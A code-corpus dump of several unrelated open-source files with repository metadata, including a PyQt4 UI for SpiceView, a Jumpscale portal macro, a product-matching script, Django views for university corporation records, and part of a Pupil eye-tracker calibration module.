if __name__ == '__main__':
for i in range(2, 10, 1):
crawl(i)
time.sleep(5)
|
apache-2.0
| -1,926,016,843,630,203,600
| 34.855556
| 152
| 0.653092
| false
| 2.785714
| false
| false
| false
|
mdavidsaver/spicetools
|
spicetools/view/mainwin_ui.py
|
1
|
8609
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'spicetools/view/mainwin.ui'
#
# Created: Sun Apr 27 13:13:01 2014
# by: PyQt4 UI code generator 4.9.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(746, 516)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/icon.svg")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout_3 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.sets = QtGui.QComboBox(self.centralwidget)
self.sets.setObjectName(_fromUtf8("sets"))
self.verticalLayout.addWidget(self.sets)
self.label_2 = QtGui.QLabel(self.centralwidget)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.xaxis = QtGui.QComboBox(self.centralwidget)
self.xaxis.setObjectName(_fromUtf8("xaxis"))
self.verticalLayout.addWidget(self.xaxis)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_4 = QtGui.QLabel(self.centralwidget)
self.label_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.horizontalLayout.addWidget(self.label_4)
self.ops = QtGui.QComboBox(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ops.sizePolicy().hasHeightForWidth())
self.ops.setSizePolicy(sizePolicy)
self.ops.setObjectName(_fromUtf8("ops"))
self.horizontalLayout.addWidget(self.ops)
self.verticalLayout.addLayout(self.horizontalLayout)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.signals = QtGui.QListWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.signals.sizePolicy().hasHeightForWidth())
self.signals.setSizePolicy(sizePolicy)
self.signals.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
self.signals.setObjectName(_fromUtf8("signals"))
self.verticalLayout.addWidget(self.signals)
self.horizontalLayout_3.addLayout(self.verticalLayout)
self.canvas = PlotArea(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.canvas.sizePolicy().hasHeightForWidth())
self.canvas.setSizePolicy(sizePolicy)
self.canvas.setObjectName(_fromUtf8("canvas"))
self.horizontalLayout_3.addWidget(self.canvas)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 746, 20))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menu_File = QtGui.QMenu(self.menubar)
self.menu_File.setObjectName(_fromUtf8("menu_File"))
self.menuAbout = QtGui.QMenu(self.menubar)
self.menuAbout.setObjectName(_fromUtf8("menuAbout"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionE_xit = QtGui.QAction(MainWindow)
self.actionE_xit.setMenuRole(QtGui.QAction.QuitRole)
self.actionE_xit.setObjectName(_fromUtf8("actionE_xit"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionAboutQt = QtGui.QAction(MainWindow)
self.actionAboutQt.setObjectName(_fromUtf8("actionAboutQt"))
self.actionClose = QtGui.QAction(MainWindow)
self.actionClose.setObjectName(_fromUtf8("actionClose"))
self.actionReload = QtGui.QAction(MainWindow)
self.actionReload.setObjectName(_fromUtf8("actionReload"))
self.actionCloneWindow = QtGui.QAction(MainWindow)
self.actionCloneWindow.setObjectName(_fromUtf8("actionCloneWindow"))
self.menu_File.addAction(self.actionCloneWindow)
self.menu_File.addAction(self.actionOpen)
self.menu_File.addAction(self.actionReload)
self.menu_File.addAction(self.actionClose)
self.menu_File.addSeparator()
self.menu_File.addAction(self.actionE_xit)
self.menuAbout.addAction(self.actionAbout)
self.menuAbout.addAction(self.actionAboutQt)
self.menubar.addAction(self.menu_File.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.actionE_xit, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "SpiceView", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("MainWindow", "Vector Set", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("MainWindow", "X Vector", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(QtGui.QApplication.translate("MainWindow", "Op:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "Y Vector(s)", None, QtGui.QApplication.UnicodeUTF8))
self.signals.setSortingEnabled(True)
self.menu_File.setTitle(QtGui.QApplication.translate("MainWindow", "&File", None, QtGui.QApplication.UnicodeUTF8))
self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "&Help", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setText(QtGui.QApplication.translate("MainWindow", "&Open", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+O", None, QtGui.QApplication.UnicodeUTF8))
self.actionE_xit.setText(QtGui.QApplication.translate("MainWindow", "E&xit", None, QtGui.QApplication.UnicodeUTF8))
self.actionE_xit.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+Q", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutQt.setText(QtGui.QApplication.translate("MainWindow", "About Qt", None, QtGui.QApplication.UnicodeUTF8))
self.actionClose.setText(QtGui.QApplication.translate("MainWindow", "&Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionReload.setText(QtGui.QApplication.translate("MainWindow", "&Reload", None, QtGui.QApplication.UnicodeUTF8))
self.actionReload.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+R", None, QtGui.QApplication.UnicodeUTF8))
self.actionCloneWindow.setText(QtGui.QApplication.translate("MainWindow", "Clone Wi&ndow", None, QtGui.QApplication.UnicodeUTF8))
from .plotarea import PlotArea
from . import viewer_rc
|
gpl-3.0
| 8,151,757,473,375,844,000
| 58.784722
| 137
| 0.724707
| false
| 4.043682
| false
| false
| false
|
Jumpscale/jumpscale_portal8
|
apps/portalbase/macros/page/action/3_action.py
|
1
|
1083
|
def main(j, args, params, tags, tasklet):
page = args.page
data = {'action': args.getTag('id'),
'class': args.getTag('class') or '',
'deleterow': args.getTag('deleterow') or 'false',
'label': args.getTag('label') or '',
}
extradata = {}
tags = j.data.tags.getObject(args.cmdstr, None)
for tagname, tagvalue in tags.getDict().items():
if tagname.startswith('data-'):
extradata[tagname[5:]] = tagvalue
data['data'] = j.data.serializer.json.dumps(extradata)
if data['class']:
data['label'] = "<span class='%(class)s'></span> %(label)s" % data
element = "<a class='js_action'" \
" data-action='%(action)s'" \
" data-extradata='%(data)s'" \
" data-deleterow='%(deleterow)s'" \
"href='javascript:void(0);'>%(label)s</a>" % data
page.addMessage(element)
page.addJS('/system/.files/js/action.js', header=False)
params.result = page
return params
def match(j, args, params, tags, tasklet):
return True
|
apache-2.0
| 6,079,685,514,749,661,000
| 32.84375
| 74
| 0.554017
| false
| 3.493548
| false
| false
| false
|
volnrok/sortable-challenge
|
main.py
|
1
|
3683
|
import json
import random
import re
from check import check_match
from encoder import Encoder
from listing import Listing
from product import Product
# We'll sort products by manufacturer first
man_lookup = {}
# List of common manufacturer aliases
aliases = {
'agfaphoto': 'agfa',
'fuji': 'fujifilm',
'hewlett': 'hp',
'konica': 'konica minolta',
'sigmatek': 'sigma'
}
with open('products.txt', encoding='utf-8') as file:
for j in file:
product = Product(j)
man = product.manufacturer.lower()
# New manufacturer
if man not in man_lookup:
man_lookup[man] = []
# Enter product into data store
man_lookup[man].append(product)
with open('listings.txt', encoding='utf-8') as file:
mcount = 0
lcount = 0
man_cutoff = 3 # Only check the first few words for manufacturer matches
word_pattern = re.compile('\w+')
for j in file:
listing = Listing(j)
man = listing.manufacturer.lower()
if man not in man_lookup:
if man in aliases:
# First look for manufacturer aliases match
man = aliases[man]
else:
i = 0
# Try to find a manufacturer match, look for words in the listing title
for match in word_pattern.finditer(listing.title):
match_str = match.group(0).lower()
if match_str in aliases:
man = aliases[match_str]
break
if match_str in man_lookup:
man = match_str
break
i += 1
# Actual product matches (vs accessories) will have a manufacturer match in the first few words
if i >= man_cutoff:
break
if man in man_lookup:
model_matches = []
family_matches = []
for product in man_lookup[man]:
match = check_match(product, listing)
# Don't count model matches with single-character models
if match['m_match'] and len(product.model) > 1:
model_matches.append((product, match['m_index']))
if match['f_match'] >= 2:
family_matches.append((product, match['m_index']))
matched = False
if len(model_matches) == 1:
matched = model_matches[0]
elif len(family_matches) == 1:
matched = family_matches[0]
if matched:
# If the manufacturer is present in the title multiple times, check that the product model happens before the second
i = 0
second_index = 0
for man_match in re.finditer(man, listing.title, re.IGNORECASE):
i += 1
if i >= 2:
second_index = man_match.start(0)
break
if i >= 2 and second_index < matched[1]:
pass
else:
mcount += 1
matched[0].matches.append(listing)
lcount += 1
if lcount % 1000 == 0:
print('.', end='')
print()
print(lcount, 'listings read,', mcount, 'matches found')
with open('matches.txt', mode='w', encoding='utf-8') as file:
for man in man_lookup:
for product in man_lookup[man]:
if len(product.matches):
file.write(json.dumps(product, cls=Encoder, ensure_ascii=False))
file.write('\n')
print('Results saved to matches.txt')
|
mit
| -3,413,363,037,030,869,000
| 31.307018
| 132
| 0.519685
| false
| 4.38975
| false
| false
| false
|
Jorgesolis1989/SIVORE
|
corporaciones/views.py
|
1
|
11935
|
from django.shortcuts import render_to_response
from django.shortcuts import render ,redirect
from django.template.context import RequestContext
from corporaciones.models import Corporacion , Sede
from django.contrib.auth.decorators import permission_required
from corporaciones.forms import FormularioRegistroCorporacion, FormularioEditarCorporacion , FormularioCargar
from votantes.models import Votante
from planchas.models import Plancha
from candidatos.models import Candidato
from usuarios.models import Usuario
from django.db.models import Q
import csv
# -*- coding: utf-8 -*-
from io import StringIO
@permission_required("usuarios.Administrador" , login_url="/")
def registro_corporacion(request):
mensaje = ""
if request.method == 'POST' and "btncreate" in request.POST:
form = FormularioRegistroCorporacion(request.POST)
form2 = FormularioCargar(request.POST , request.FILES)
#Si el formulario es valido y tiene datos
if form.is_valid():
#Capture el id de corporacion
id_corporation = form.cleaned_data["id_corporation"]
sede = form.cleaned_data["sede"]
#Consultando la corporacion en la base de datos.
try:
corporacion = Corporacion.objects.get(id_corporation=id_corporation , sede=sede)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
corporacion_create(corporacion, form)
llamarMensaje = "exito_corporacion"
if form.cleaned_data["facultad"] is None or form.cleaned_data["sede"] is None:
mensaje = "La corporacion "+ str(id_corporation) +" se guardo correctamente"
else:
mensaje = "La corporacion "+ str(id_corporation) +" sede "+str(sede.nombre_sede)+" se guardo correctamente"
else:
if not corporacion.is_active:
corporacion_create(corporacion, form)
llamarMensaje = "exito_corporacion"
mensaje = "La corporación "+ str(id_corporation) +" se guardo correctamente"
else:
llamarMensaje = "fracaso_corporacion"
mensaje = "La corporacion "+ str(corporacion) + " ya esta registrada"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
form = FormularioRegistroCorporacion()
data = {
'form': form,
}
return render_to_response('registro_corporacion.html', data, context_instance=RequestContext(request))
elif request.method == 'POST' and "btnload" in request.POST:
form = FormularioRegistroCorporacion()
form2 = FormularioCargar(request.POST , request.FILES)
#Si el formulario es valido y tiene datos
if form2.is_valid():
try:
csvf = StringIO(request.FILES['file'].read().decode('ISO-8859-3'))
except Exception as e:
llamarMensaje = "fracaso_corporacion"
mensaje = "Error en el formato del archivo de entrada"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
reader = csv.reader(csvf, delimiter=';')
line=0
counter= 0
# Verificar y crear si estan creadas las sedes.
diccionarioSedes= {'CALI':'0', 'BUGA':'1', 'CAICEDONIA':'2', 'CARTAGO':'3', 'PACIFICO':'4',
'PALMIRA':'5','TULUA':'6', 'ZARZAL':'7', 'YUMBO':'14',
'SANTANDER DE QUILICHAO':'21'}
#COD. PROGRAMA;PROGRAMA ACADÉMICO;JORNADA;FACULTAD;SEDE
for nombre,codigo in diccionarioSedes.items():
try:
Sede.objects.get(codigo=codigo, is_active=True)
except Sede.DoesNotExist:
sede = Sede()
sede.codigo = codigo
sede.nombre_sede = nombre
try:
sede.save()
except Exception as e:
print("No se pudo guardar la sede" + sede.nombre_sede)
# Verificar y crear si estan creadas las facultades
diccionarioFacultad= { 'CONSEJO SUPERIOR':'1', 'CONSEJO ACADÉMICO':'2',
'INGENIERÍA':'3', 'CIENCIAS DE LA ADMINISTRACIÓN':'4',
'CIENCIAS NATURALES Y EXACTAS':'5', 'HUMANIDADES':'6',
'CIENCIAS SOCIALES Y ECONÓMICAS':'7', 'ARTES INTEGRADAS':'8',
'SALUD':'9', 'INSTITUTO DE EDUCACIÓN Y PEDAGOGÍA':'10' ,
'INSTITUTO DE PSICOLOGÍA': '11'}
# Creando las facultades
for nombre,codigo in diccionarioFacultad.items():
try:
Corporacion.objects.get(id_corporation=codigo, is_active=True)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
corporacion.id_corporation = codigo
# Codigo de las corproaciones que no llevan Facultad
if codigo not in {'1' , '2' , '10', '11'}:
corporacion.name_corporation = "FACULTAD DE " + nombre
else:
corporacion.name_corporation = nombre
try:
corporacion.save()
except Exception as e:
print("No se pudo guardar la corporacion" + corporacion.name_corporation)
#COD. PROGRAMA;PROGRAMA ACADÉMICO;JORNADA;FACULTAD;SEDE
# Ahora crear las corporaciones
for row in reader:
if line > 0:
try:
Corporacion.objects.get(id_corporation=row[0] , sede__codigo=diccionarioSedes.get(row[4]) , is_active=True)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
try:
corporacion.id_corporation = row[0]
corporacion.name_corporation = row[1]
corporacion.facultad = Corporacion.objects.get(id_corporation=diccionarioFacultad.get(row[3]))
sede = diccionarioSedes.get(row[4])
corporacion.sede = Sede.objects.get(codigo=sede)
corporacion.save()
counter+= 1
except Exception as e:
print(e)
except Exception as e:
llamarMensaje = "fracaso_corporacion"
mensaje = "Hubo un problema con el archivo de entrada, no coinciden los datos de entrada con la especificaciones dadaas"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
line =+ 1
#Consultando la corporacion en la base de datos.
llamarMensaje = "exito_corporacion"
mensaje = "Se crearon " + str(counter)+" corporacion(es) sactisfactoriamente"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
form = FormularioRegistroCorporacion()
form2 = FormularioCargar()
return render(request, 'registro_corporacion.html',{'mensaje': mensaje, 'form': form , 'form2': form2})
# Vista para listar corporaciones
@permission_required("usuarios.Administrador", login_url="/")
def listar_corporacion(request):
llamarMensaje = request.session.pop('llamarMensaje', None)
mensaje = request.session.pop('mensaje', None)
corporaciones = Corporacion.objects.filter(is_active=True)
return render(request, 'listar_corporaciones.html', {'corporaciones': corporaciones , 'llamarMensaje': llamarMensaje,'mensaje':mensaje })
#Edicion usuarios
@permission_required("usuarios.Administrador" , login_url="/")
def editar_corporacion(request, id_corporation=None):
corporacion = Corporacion.objects.get(id=id_corporation)
if request.method == 'POST':
form = FormularioEditarCorporacion(request.POST)
#Si el formulario es valido y tiene datos
if form.is_valid():
#Capture el id de corporacion
corporacion.name_corporation = form.cleaned_data["name_corporation"]
corporacion.facultad = form.cleaned_data["facultad"]
corporacion.sede = form.cleaned_data["sede"]
#Actualiza la corporacion en la BD si hay excepcion
try:
corporacion.save()
except Exception as e:
print(e)
#Consultando la corporacion en la base de datos.
llamarMensaje = "edito_corporacion"
mensaje = "Se editó la corporacion " +str(corporacion) +" sactisfactoriamente"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
print("por aca")
else:
if id_corporation is None:
return render(request, 'administrador.html')
else:
form = FormularioEditarCorporacion()
form.initial = {'id_corporation': corporacion.id_corporation, 'name_corporation': corporacion.name_corporation, 'facultad': corporacion.facultad,
'sede': corporacion.sede}
if corporacion.facultad is not None:
form.fields["facultad"].empty_label = None
form.fields["sede"].empty_label = None
else:
form.fields['facultad'].widget.attrs['disabled'] = True
form.fields['sede'].widget.attrs['disabled'] = True
return render(request, 'editar_corporacion.html', {'form': form})
# Este metodo no elimina en la base de datos, sino que desactiva la corporacion
@permission_required("usuarios.Administrador", login_url="/")
def eliminar_corporacion(request, id_corporation=None):
if request.method == 'POST':
corporacion=Corporacion.objects.get(id=id_corporation)
# sacando los votantes de la corporacion
votantes_corporacion = Votante.objects.filter((Q(plan__facultad__id=corporacion.id) | Q(plan__id=corporacion.id)) & Q(is_active=True))
# Si la corporacion tiene votantes
if votantes_corporacion:
llamarMensaje = "fracaso_usuario"
mensaje = "No se eliminó la corporacion " + str(id_corporation) +" porque tiene votantes asociados"
else:
corporacion.is_active = False
llamarMensaje = "exito_usuario"
mensaje = "Se eliminó la corporacion " + str(id_corporation) +" sactisfactoriamente"
try:
corporacion.save()
except Exception as e:
print(e)
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
def corporacion_create(corporacion, form):
corporacion.id_corporation= form.cleaned_data["id_corporation"]
corporacion.name_corporation= form.cleaned_data["name_corporation"]
corporacion.facultad= form.cleaned_data["facultad"]
corporacion.sede= form.cleaned_data["sede"]
corporacion.is_active = True
try:
corporacion.save()
except Exception as e:
print(e)
|
apache-2.0
| 9,110,471,766,066,271,000
| 43.155556
| 157
| 0.585472
| false
| 3.509567
| false
| false
| false
|
teamCarel/EyeTracker
|
src/shared_modules/calibration_routines/finish_calibration.py
|
1
|
17482
|
'''
(*)~---------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2017 Pupil Labs
Distributed under the terms of the GNU
Lesser General Public License (LGPL v3.0).
See COPYING and COPYING.LESSER for license details.
---------------------------------------------------------------------------~(*)
'''
import os
import numpy as np
from . import calibrate
from math_helper import *
from file_methods import load_object,save_object
from . camera_intrinsics_estimation import load_camera_calibration
from . optimization_calibration import bundle_adjust_calibration
from . calibrate import find_rigid_transform
#logging
import logging
logger = logging.getLogger(__name__)
from . gaze_mappers import *
not_enough_data_error_msg = 'Did not collect enough data during calibration.'
solver_failed_to_converge_error_msg = 'Paramters could not be estimated from data.'
def finish_calibration(g_pool,pupil_list,ref_list):
if pupil_list and ref_list:
pass
else:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
camera_intrinsics = load_camera_calibration(g_pool)
# match eye data and check if biocular and or monocular
pupil0 = [p for p in pupil_list if p['id']==0]
pupil1 = [p for p in pupil_list if p['id']==1]
#TODO unify this and don't do both
matched_binocular_data = calibrate.closest_matches_binocular(ref_list,pupil_list)
matched_pupil0_data = calibrate.closest_matches_monocular(ref_list,pupil0)
matched_pupil1_data = calibrate.closest_matches_monocular(ref_list,pupil1)
if len(matched_pupil0_data)>len(matched_pupil1_data):
matched_monocular_data = matched_pupil0_data
else:
matched_monocular_data = matched_pupil1_data
logger.info('Collected {} monocular calibration data.'.format(len(matched_monocular_data)))
logger.info('Collected {} binocular calibration data.'.format(len(matched_binocular_data)))
mode = g_pool.detection_mapping_mode
if mode == '3d' and not camera_intrinsics:
mode = '2d'
logger.warning("Please calibrate your world camera using 'camera intrinsics estimation' for 3d gaze mapping.")
if mode == '3d':
hardcoded_translation0 = np.array([20,15,-20])
hardcoded_translation1 = np.array([-40,15,-20])
if matched_binocular_data:
method = 'binocular 3d model'
#TODO model the world as cv2 pinhole camera with distorion and focal in ceres.
# right now we solve using a few permutations of K
smallest_residual = 1000
scales = list(np.linspace(0.7,1.4,20))
K = camera_intrinsics["camera_matrix"]
for s in scales:
scale = np.ones(K.shape)
scale[0,0] *= s
scale[1,1] *= s
camera_intrinsics["camera_matrix"] = K*scale
ref_dir, gaze0_dir, gaze1_dir = calibrate.preprocess_3d_data(matched_binocular_data,
camera_intrinsics = camera_intrinsics )
if len(ref_dir) < 1 or len(gaze0_dir) < 1 or len(gaze1_dir) < 1:
logger.error(not_enough_data_error_msg)
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
sphere_pos0 = pupil0[-1]['sphere']['center']
sphere_pos1 = pupil1[-1]['sphere']['center']
initial_R0,initial_t0 = find_rigid_transform(np.array(gaze0_dir)*500,np.array(ref_dir)*500)
initial_rotation0 = math_helper.quaternion_from_rotation_matrix(initial_R0)
initial_translation0 = np.array(initial_t0).reshape(3)
initial_R1,initial_t1 = find_rigid_transform(np.array(gaze1_dir)*500,np.array(ref_dir)*500)
initial_rotation1 = math_helper.quaternion_from_rotation_matrix(initial_R1)
initial_translation1 = np.array(initial_t1).reshape(3)
eye0 = { "observations" : gaze0_dir , "translation" : hardcoded_translation0 , "rotation" : initial_rotation0,'fix':['translation'] }
eye1 = { "observations" : gaze1_dir , "translation" : hardcoded_translation1 , "rotation" : initial_rotation1,'fix':['translation'] }
world = { "observations" : ref_dir , "translation" : (0,0,0) , "rotation" : (1,0,0,0),'fix':['translation','rotation'],'fix':['translation','rotation'] }
initial_observers = [eye0,eye1,world]
initial_points = np.array(ref_dir)*500
success,residual, observers, points = bundle_adjust_calibration(initial_observers , initial_points, fix_points=False )
if residual <= smallest_residual:
smallest_residual = residual
scales[-1] = s
if not success:
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
logger.error("Calibration solver faild to converge.")
return
eye0,eye1,world = observers
t_world0 = np.array(eye0['translation'])
R_world0 = math_helper.quaternion_rotation_matrix(np.array(eye0['rotation']))
t_world1 = np.array(eye1['translation'])
R_world1 = math_helper.quaternion_rotation_matrix(np.array(eye1['rotation']))
def toWorld0(p):
return np.dot(R_world0, p)+t_world0
def toWorld1(p):
return np.dot(R_world1, p)+t_world1
points_a = [] #world coords
points_b = [] #eye0 coords
points_c = [] #eye1 coords
for a,b,c,point in zip(world['observations'] , eye0['observations'],eye1['observations'],points):
line_a = np.array([0,0,0]) , np.array(a) #observation as line
line_b = toWorld0(np.array([0,0,0])) , toWorld0(b) #eye0 observation line in world coords
line_c = toWorld1(np.array([0,0,0])) , toWorld1(c) #eye1 observation line in world coords
close_point_a,_ = math_helper.nearest_linepoint_to_point( point , line_a )
close_point_b,_ = math_helper.nearest_linepoint_to_point( point , line_b )
close_point_c,_ = math_helper.nearest_linepoint_to_point( point , line_c )
points_a.append(close_point_a)
points_b.append(close_point_b)
points_c.append(close_point_c)
# we need to take the sphere position into account
# orientation and translation are referring to the sphere center.
# but we want to have it referring to the camera center
# since the actual translation is in world coordinates, the sphere translation needs to be calculated in world coordinates
sphere_translation = np.array( sphere_pos0 )
sphere_translation_world = np.dot( R_world0 , sphere_translation)
camera_translation = t_world0 - sphere_translation_world
eye_camera_to_world_matrix0 = np.eye(4)
eye_camera_to_world_matrix0[:3,:3] = R_world0
eye_camera_to_world_matrix0[:3,3:4] = np.reshape(camera_translation, (3,1) )
sphere_translation = np.array( sphere_pos1 )
sphere_translation_world = np.dot( R_world1 , sphere_translation)
camera_translation = t_world1 - sphere_translation_world
eye_camera_to_world_matrix1 = np.eye(4)
eye_camera_to_world_matrix1[:3,:3] = R_world1
eye_camera_to_world_matrix1[:3,3:4] = np.reshape(camera_translation, (3,1) )
g_pool.plugins.add(Binocular_Vector_Gaze_Mapper,args={
'eye_camera_to_world_matrix0':eye_camera_to_world_matrix0,
'eye_camera_to_world_matrix1':eye_camera_to_world_matrix1 ,
'camera_intrinsics': camera_intrinsics ,
'cal_points_3d': points,
'cal_ref_points_3d': points_a,
'cal_gaze_points0_3d': points_b,
'cal_gaze_points1_3d': points_c})
elif matched_monocular_data:
method = 'monocular 3d model'
#TODO model the world as cv2 pinhole camera with distorion and focal in ceres.
# right now we solve using a few permutations of K
smallest_residual = 1000
scales = list(np.linspace(0.7,1.4,20))
K = camera_intrinsics["camera_matrix"]
for s in scales:
scale = np.ones(K.shape)
scale[0,0] *= s
scale[1,1] *= s
camera_intrinsics["camera_matrix"] = K*scale
ref_dir , gaze_dir, _ = calibrate.preprocess_3d_data(matched_monocular_data,
camera_intrinsics = camera_intrinsics )
# save_object((ref_dir,gaze_dir),os.path.join(g_pool.user_dir, "testdata"))
if len(ref_dir) < 1 or len(gaze_dir) < 1:
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':not_enough_data_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
logger.error(not_enough_data_error_msg + " Using:" + method)
return
### monocular calibration strategy: mimize the reprojection error by moving the world camera.
# we fix the eye points and work in the eye coord system.
initial_R,initial_t = find_rigid_transform(np.array(ref_dir)*500,np.array(gaze_dir)*500)
initial_rotation = math_helper.quaternion_from_rotation_matrix(initial_R)
initial_translation = np.array(initial_t).reshape(3)
# this problem is scale invariant so we scale to some sensical value.
if matched_monocular_data[0]['pupil']['id'] == 0:
hardcoded_translation = hardcoded_translation0
else:
hardcoded_translation = hardcoded_translation1
eye = { "observations" : gaze_dir , "translation" : (0,0,0) , "rotation" : (1,0,0,0),'fix':['translation','rotation'] }
world = { "observations" : ref_dir , "translation" : np.dot(initial_R,-hardcoded_translation) , "rotation" : initial_rotation,'fix':['translation'] }
initial_observers = [eye,world]
initial_points = np.array(gaze_dir)*500
success,residual, observers, points_in_eye = bundle_adjust_calibration(initial_observers , initial_points, fix_points=True )
if residual <= smallest_residual:
smallest_residual = residual
scales[-1] = s
eye, world = observers
if not success:
logger.error("Calibration solver faild to converge.")
g_pool.active_calibration_plugin.notify_all({'subject':'calibration.failed','reason':solver_failed_to_converge_error_msg,'timestamp':g_pool.get_timestamp(),'record':True})
return
#pose of the world in eye coords.
rotation = np.array(world['rotation'])
t_world = np.array(world['translation'])
R_world = math_helper.quaternion_rotation_matrix(rotation)
# inverse is pose of eye in world coords
R_eye = R_world.T
t_eye = np.dot(R_eye,-t_world)
def toWorld(p):
return np.dot(R_eye, p)+np.array(t_eye)
points_in_world = [toWorld(p) for p in points_in_eye]
points_a = [] #world coords
points_b = [] #cam2 coords
for a,b,point in zip(world['observations'] , eye['observations'],points_in_world):
line_a = np.array([0,0,0]) , np.array(a) #observation as line
line_b = toWorld(np.array([0,0,0])) , toWorld(b) #cam2 observation line in cam1 coords
close_point_a,_ = math_helper.nearest_linepoint_to_point( point , line_a )
close_point_b,_ = math_helper.nearest_linepoint_to_point( point , line_b )
# print np.linalg.norm(point-close_point_a),np.linalg.norm(point-close_point_b)
points_a.append(close_point_a)
points_b.append(close_point_b)
# we need to take the sphere position into account
# orientation and translation are referring to the sphere center.
# but we want to have it referring to the camera center
# since the actual translation is in world coordinates, the sphere translation needs to be calculated in world coordinates
sphere_translation = np.array( matched_monocular_data[-1]['pupil']['sphere']['center'] )
sphere_translation_world = np.dot( R_eye , sphere_translation)
camera_translation = t_eye - sphere_translation_world
eye_camera_to_world_matrix = np.eye(4)
eye_camera_to_world_matrix[:3,:3] = R_eye
eye_camera_to_world_matrix[:3,3:4] = np.reshape(camera_translation, (3,1) )
g_pool.plugins.add(Vector_Gaze_Mapper,args=
